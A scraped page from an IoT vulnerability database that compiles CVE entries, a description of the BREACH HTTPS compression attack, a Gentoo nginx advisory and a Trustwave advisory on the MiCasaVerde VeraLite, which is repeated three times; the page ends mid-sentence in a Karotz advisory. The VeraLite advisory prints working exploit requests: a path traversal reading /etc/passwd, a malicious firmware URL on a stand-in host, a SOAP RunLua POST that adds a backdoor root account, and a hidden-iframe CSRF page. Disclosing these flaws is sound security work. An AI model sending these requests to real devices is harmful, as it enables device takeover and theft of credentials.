VARIoT IoT vulnerabilities database

The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. Compressed HTTPS By observing the length of the response, the attacker HTTPS From stream ciphertext, website authentication key, etc. (secret) Is possible to guess. Salesforce.com of Angelo Prado He reports as follows. * Extending the CRIME vulnerability presented at Ekoparty 2012, an attacker can target HTTPS responses to recover data from the response body. * While the CRIME attack is currently believed to be mitigated by disabling TLS/SSL/level compression, compressed HTTP responses represent a significant unmitigated vector which is currently exploitable. By injecting plaintext into an HTTPS request, an attacker can learn information about the corresponding HTTPS response by measuring its size. * This relies on the attacker being able to observe the size of the cipher text received by the browser while triggering a number of strategically crafted requests to a target site. To recover a particular secret in an HTTPS response body, the attacker guesses character by character, sending a pair of requests for each guess. The correct guess will result in a smaller HTTPS response. For each guess the attacker coerces the victim's browser to issue two requests. The first request includes a payload of the form: "target_secret_name=<already known part of secret>+<guess>+<padding>" ...while the second request includes a payload of the form: "target_secret_name=<already known part of secret>+<padding>+<guess>". * If the size of the first response is smaller than the second response, this indicates that the guess has a good chance of being correct. This method of sending two similar requests and comparing them is due to Duong and Rizzo. If multiple candidates are found, the following is a useful recovery mechanism: move forward in parallel with both candidates until it becomes clear which guess is correct. * With a token of length 32 and a character space of size 16 (e.g. hex), the attacker needs an average of approximately 1,000 request if no recovery mechanisms are needed. In practice, we have been able to recover CSRF tokens with fewer than 4,000 requests. A browser like Google Chrome or Internet Explorer is able to issue this number of requests in under 30 seconds, including callbacks to the attacker command & control center. [In order to conduct the attack, the following conditions must be true]: * 1. HTTPS-enabled endpoint (ideally with stream ciphers like RC4, although the attack can be made to work with adaptive padding for block ciphers). * 2. The attacker must be able to measure the size of HTTPS responses. * 3. Use of HTTP-level compression (e.g. gzip). * 4. A request parameter that is reflected in the response body. * 5. A static secret in the body (e.g. CSRF token, sessionId, VIEWSTATE, PII, etc.) that can be bootstrapped (either first/last two characters are predictable and/or the secret is padded with something like KnownSecretVariableName="". * 6. An otherwise static or relatively static response. Dynamic pages do not defeat the attack, but make it much more expensive.Encrypted by a remote third party HTTPS From the response, the key used to authenticate the website CSRF Information such as tokens (secret) May get you. TLS protocol is prone to an information-disclosure vulnerability. A man-in-the-middle attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. HTTPS (Hypertext Transfer Protocol Secure) is a network security transmission protocol, which communicates via Hypertext Transfer Protocol (HTTP) on a computer network, and uses SSL/TLS to encrypt data packets. The main purpose of HTTPS development is to provide identity authentication to web servers and protect the privacy and integrity of exchanged data. There is an information disclosure vulnerability in the HTTPS protocol, which stems from the fact that the program does not confuse the length of the encrypted data when encrypting the compressed data. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201606-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: nginx: Multiple vulnerabilities Date: June 17, 2016 Bugs: #560854, #573046, #584744 ID: 201606-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in nginx, the worst of which may allow a remote attacker to cause a Denial of Service. Background ========== nginx is a robust, small, and high performance HTTP and reverse proxy server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-servers/nginx < 1.10.1 >= 1.10.1 Description =========== Multiple vulnerabilities have been discovered in nginx. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could possibly cause a Denial of Service condition via a crafted packet. Workaround ========== There is no known workaround at this time. Resolution ========== All nginx users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/nginx-1.10.1" References ========== [ 1 ] CVE-2013-3587 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3587 [ 2 ] CVE-2016-0742 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0742 [ 3 ] CVE-2016-0746 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0746 [ 4 ] CVE-2016-0747 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0747 [ 5 ] CVE-2016-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4450 [ 6 ] CVE-2016-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201606-06 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Directory traversal vulnerability in cgi-bin/cmh/get_file.sh in MiCasaVerde VeraLite with firmware 1.5.408 allows remote authenticated users to read arbirary files via a .. (dot dot) in the filename parameter. MiCasaVerde VeraLite Contains a path traversal vulnerability.Information may be obtained. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A directory traversal vulnerability exists in Mi Casa Verde VeraLite. Because the program fails to properly filter user-submitted input, a remote attacker can use a specially crafted request with a directory traversal word sequence ('../') to exploit the vulnerability to retrieve arbitrary files in the context of the affected device. Information that helps to launch further attacks. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde (http://www.micasaverde.com/) Product: VeraLite Version affected: 1.5.408 Product description: The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product which centralizes control over home automation devices such as door locks, window blinds, security cameras, smoke detectors, HVAC systems, lights, etc. Finding 1: Path Traversal *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4861 CWE: CWE-23 The VeraLite has a path traversal vulnerability allowing for disclosure of arbitrary files. This allows an attacker to retrieve the contents of any file on the system such as the /etc/passwd file which contains the hashed root password as well as the tech support remote access password if remote access has been configured. A proof of concept can be run against a VeraLite by using the following URL: GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd On a newly unboxed VeraLite, this shouldn't work as the first part of the path used by the script doesn't exist, but the directory which must exist for exploitation to work correctly can be created by using the store_file.sh script, like so: GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test This attack can also be launched through the Internet-based control panel at cp.mios.com when logged in as either an admin or guest level account. Finding 2: Insufficient Authorization Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4862 CWE: CWE-285 The VeraLite makes a distinction between Administrator and Guest users such that Guest users should not be able to make changes to the configuration of the system. There are several functionalities included in the VeraLite console available to Guest level users which can be used to escalate privileges. A) Firmware update - This allows a guest to push custom firmware to the unit and can allow for full compromise of the device. A proof of concept can be seen using the following URL: GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs B) Settings backup - This allows a guest to obtain copies of various sensitive files, including the lighttpd.users file which contains hashed cp.mios.com passwords, and the passwd file which contains the hashed root password. GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1 C) Test Luup code (Lua) - This allows a guest to run Lua code on the VeraLite as root. A backdoor account can be added with the following POST request: POST /port_49451/upnp/control/hag HTTP/1.1 Host: A.B.C.D Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 3: Insufficient Authentication Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4863 CWE: CWE-287 The VeraLite exposes UPnP functionality which allows for Lua code to be run as root from the LAN without authentication using the RunLua action in the HomeAutomationGateway service of the HomeAutomationGateway device. A backdoor account can be added with the following POST request to port 49451: POST /upnp/control/hag HTTP/1.1 Host: A.B.C.D:49451 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 4: Server-Side Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4864 CWE: CWE-918 The VeraLite will make HTTP requests on behalf of a user using the /cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of trustwave.com is as follows: GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com This allows an attacker to bypass firewall controls, use the VeraLite as a proxy Finding 5: Cross-Site Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4865 CWE: CWE-352 The VeraLite does not implement any defense against cross-site request forgery. A proof of concept as seen below can cause a Vera user to update their firmware using a custom firmware URL: <html> <body> <iframe src="http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs" width="1" height="1"> </iframe> </body> </html> If this PoC was embedded in any web page a targeted user visited, an attacker would be able to make arbitrary changes to the firmware on the device, allowing the potential for remote root access. Vendor Response: "...the "vulnerabilities" you referred to were deliberate design decisions because that's what the customers in this particular channel (ie Vera retail) want. As you can see we have an open forum to discuss this, and very people object to leaving Vera open. So we are not able to lock down the gateway, and effectively break the systems of many customers who rely on the open system to run their own scripts and plugins." Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of access control lists and proper network segmentation. Revision History: 04/23/13 - Vulnerability disclosed to vendor 06/04/13 - Vendor confirms they will not fix 08/01/13 - Advisory published References 1. http://www.micasaverde.com/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

The HomeAutomationGateway service in MiCasaVerde VeraLite with firmware 1.5.408 allows (1) remote attackers to execute arbitrary Lua code via a RunLua action in a request to upnp/control/hag on port 49451 or (2) remote authenticated users to execute arbitrary Lua code via a RunLua action in a request to port_49451/upnp/control/hag. MiCasaVerde VeraLite Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. A remote identity bypass vulnerability exists in Mi Casa Verde VeraLite. An attacker could exploit the vulnerability to bypass the authentication mechanism and gain unauthorized access to the affected device, helping to initiate further attacks. This may lead to further attacks. Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde (http://www.micasaverde.com/) Product: VeraLite Version affected: 1.5.408 Product description: The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product which centralizes control over home automation devices such as door locks, window blinds, security cameras, smoke detectors, HVAC systems, lights, etc. Finding 1: Path Traversal *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4861 CWE: CWE-23 The VeraLite has a path traversal vulnerability allowing for disclosure of arbitrary files. This allows an attacker to retrieve the contents of any file on the system such as the /etc/passwd file which contains the hashed root password as well as the tech support remote access password if remote access has been configured. A proof of concept can be run against a VeraLite by using the following URL: GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd On a newly unboxed VeraLite, this shouldn't work as the first part of the path used by the script doesn't exist, but the directory which must exist for exploitation to work correctly can be created by using the store_file.sh script, like so: GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test This attack can also be launched through the Internet-based control panel at cp.mios.com when logged in as either an admin or guest level account. Finding 2: Insufficient Authorization Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4862 CWE: CWE-285 The VeraLite makes a distinction between Administrator and Guest users such that Guest users should not be able to make changes to the configuration of the system. There are several functionalities included in the VeraLite console available to Guest level users which can be used to escalate privileges. A) Firmware update - This allows a guest to push custom firmware to the unit and can allow for full compromise of the device. A proof of concept can be seen using the following URL: GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs B) Settings backup - This allows a guest to obtain copies of various sensitive files, including the lighttpd.users file which contains hashed cp.mios.com passwords, and the passwd file which contains the hashed root password. GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1 C) Test Luup code (Lua) - This allows a guest to run Lua code on the VeraLite as root. A backdoor account can be added with the following POST request: POST /port_49451/upnp/control/hag HTTP/1.1 Host: A.B.C.D Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 3: Insufficient Authentication Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4863 CWE: CWE-287 The VeraLite exposes UPnP functionality which allows for Lua code to be run as root from the LAN without authentication using the RunLua action in the HomeAutomationGateway service of the HomeAutomationGateway device. A backdoor account can be added with the following POST request to port 49451: POST /upnp/control/hag HTTP/1.1 Host: A.B.C.D:49451 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 4: Server-Side Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4864 CWE: CWE-918 The VeraLite will make HTTP requests on behalf of a user using the /cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of trustwave.com is as follows: GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com This allows an attacker to bypass firewall controls, use the VeraLite as a proxy Finding 5: Cross-Site Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4865 CWE: CWE-352 The VeraLite does not implement any defense against cross-site request forgery. A proof of concept as seen below can cause a Vera user to update their firmware using a custom firmware URL: <html> <body> <iframe src="http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs" width="1" height="1"> </iframe> </body> </html> If this PoC was embedded in any web page a targeted user visited, an attacker would be able to make arbitrary changes to the firmware on the device, allowing the potential for remote root access. Vendor Response: "...the "vulnerabilities" you referred to were deliberate design decisions because that's what the customers in this particular channel (ie Vera retail) want. As you can see we have an open forum to discuss this, and very people object to leaving Vera open. So we are not able to lock down the gateway, and effectively break the systems of many customers who rely on the open system to run their own scripts and plugins." Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of access control lists and proper network segmentation. Revision History: 04/23/13 - Vulnerability disclosed to vendor 06/04/13 - Vendor confirms they will not fix 08/01/13 - Advisory published References 1. http://www.micasaverde.com/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

MiCasaVerde VeraLite with firmware 1.5.408 does not properly restrict access, which allows remote authenticated users to (1) update the firmware via the squashfs parameter to upgrade_step2.sh or (2) obtain hashed passwords via the cgi-bin/cmh/backup.sh page. MiCasaVerde VeraLite Contains an invalid authentication vulnerability.The information may be obtained and the information may be altered. Mi Casa Verde VeraLite is a home gateway controller device from Mi Casa Verde, Hong Kong, China. The device can control the home appliances connected to the home Wi-Fi network through a computer or mobile phone. Multiple rights escalation vulnerabilities and information disclosure vulnerabilities exist in Mi Casa Verde VeraLite. An attacker can exploit the vulnerability to gain elevated privileges and gain unauthorized access to sensitive information. Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde (http://www.micasaverde.com/) Product: VeraLite Version affected: 1.5.408 Product description: The MiCasaVerde VeraLite is the budget model from MiCasaVerde, a product which centralizes control over home automation devices such as door locks, window blinds, security cameras, smoke detectors, HVAC systems, lights, etc. Finding 1: Path Traversal *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4861 CWE: CWE-23 The VeraLite has a path traversal vulnerability allowing for disclosure of arbitrary files. A proof of concept can be run against a VeraLite by using the following URL: GET http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd On a newly unboxed VeraLite, this shouldn't work as the first part of the path used by the script doesn't exist, but the directory which must exist for exploitation to work correctly can be created by using the store_file.sh script, like so: GET http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test This attack can also be launched through the Internet-based control panel at cp.mios.com when logged in as either an admin or guest level account. Finding 2: Insufficient Authorization Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4862 CWE: CWE-285 The VeraLite makes a distinction between Administrator and Guest users such that Guest users should not be able to make changes to the configuration of the system. There are several functionalities included in the VeraLite console available to Guest level users which can be used to escalate privileges. A) Firmware update - This allows a guest to push custom firmware to the unit and can allow for full compromise of the device. A proof of concept can be seen using the following URL: GET http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs B) Settings backup - This allows a guest to obtain copies of various sensitive files, including the lighttpd.users file which contains hashed cp.mios.com passwords, and the passwd file which contains the hashed root password. GET http://A.B.C.D/cgi-bin/cmh/backup.sh?external=1 C) Test Luup code (Lua) - This allows a guest to run Lua code on the VeraLite as root. A backdoor account can be added with the following POST request: POST /port_49451/upnp/control/hag HTTP/1.1 Host: A.B.C.D Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 3: Insufficient Authentication Checks *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4863 CWE: CWE-287 The VeraLite exposes UPnP functionality which allows for Lua code to be run as root from the LAN without authentication using the RunLua action in the HomeAutomationGateway service of the HomeAutomationGateway device. A backdoor account can be added with the following POST request to port 49451: POST /upnp/control/hag HTTP/1.1 Host: A.B.C.D:49451 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7 Content-Type: text/xml;charset=UTF-8 MIME-Version: 1.0 SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua" Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(&quot;echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd&quot;)</Code> </u:RunLua></s:Body></s:Envelope> Finding 4: Server-Side Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4864 CWE: CWE-918 The VeraLite will make HTTP requests on behalf of a user using the /cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of trustwave.com is as follows: GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com This allows an attacker to bypass firewall controls, use the VeraLite as a proxy Finding 5: Cross-Site Request Forgery *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4865 CWE: CWE-352 The VeraLite does not implement any defense against cross-site request forgery. A proof of concept as seen below can cause a Vera user to update their firmware using a custom firmware URL: <html> <body> <iframe src="http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs" width="1" height="1"> </iframe> </body> </html> If this PoC was embedded in any web page a targeted user visited, an attacker would be able to make arbitrary changes to the firmware on the device, allowing the potential for remote root access. Vendor Response: "...the "vulnerabilities" you referred to were deliberate design decisions because that's what the customers in this particular channel (ie Vera retail) want. As you can see we have an open forum to discuss this, and very people object to leaving Vera open. So we are not able to lock down the gateway, and effectively break the systems of many customers who rely on the open system to run their own scripts and plugins." Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of access control lists and proper network segmentation. Revision History: 04/23/13 - Vulnerability disclosed to vendor 06/04/13 - Vendor confirms they will not fix 08/01/13 - Advisory published References 1. http://www.micasaverde.com/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

Karotz API Contains an information disclosure vulnerability.Information may be obtained. Violet Karotz is a device called Wireless Smart Rabbit. Violet Karotz is executed by plain text HTTP when controlling the Karotz external application through the API of api.karotz.com. The session token verification API call used to control karotz can be eavesdropped by the attacker. This token can be used to execute any remote. API calls, such as using a camera, intercepting a video screen to any server, etc. Violet Karotz is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain potentially sensitive information. Violet Karotz 12.07.19.00 is vulnerable; other may also be affected. Trustwave SpiderLabs Security Advisory TWSL2013-021: Multiple Vulnerabilities in Karotz Smart Rabbit Published: 08/01/13 Version: 1.0 Vendor: Electronic Arts (http://www.ea.com/), formerly Mindscape, formerly Violet Product: Karotz Version affected: 12.07.19.00 Product description: Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled ambient electronic device in the shape of a rabbit, invented by Rafi Haladjian and Olivier M\xe9vel, and manufactured by the company Violet.[1] Nabaztag was designed to be a "smart object" comparable to those manufactured by Ambient Devices; it can connect to the Internet (to download weather forecasts, read its owner's email, etc.). It is also customizable and programmable to an extent. Finding 1: Python Module Hijacking *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4867 CWE: CWE-427 During the setup process for a Karotz unit, if 